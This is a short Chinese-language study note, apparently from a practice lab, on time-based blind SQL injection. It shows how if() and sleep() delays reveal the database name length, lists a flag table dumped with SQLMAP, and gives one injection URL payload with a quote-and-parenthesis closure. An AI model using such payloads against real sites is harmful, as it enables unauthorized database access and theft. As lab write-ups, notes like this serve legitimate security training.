时间盲注
SQL注入回顾:网络安全笔记-99-渗透-SQL注入
使用if函数,和sleep函数进行判断
延时注入一
- 判断数据库长度
查看可知延时五秒作用,说明语句执行成功。
然后再判断数据库名称,方法类似。
结果使用SQLMAP测试出来,获得flag。
Database: kanwolongxia
Table: loflag
[5 entries]
±-----±---------------+
| Id | flaglo |
±-----±---------------+
| 1 | zKaQ-QQQ |
| 2 | zKaQ-RD |
| 3 | zKaQ-Moren |
| 4 | zKaQ-time-hj |
| 5 | zKaQ-time-zxxz |
±-----±---------------+
延时注入二
闭合方式为单引号加括号,利用方法相同。
延时注入二
闭合方式为单引号加括号,利用方法相同。
- http://inject2.lab.aqlab.cn:81/Pass-14/index.php?id=1’) and if(length(database())=12,sleep(5),1)–+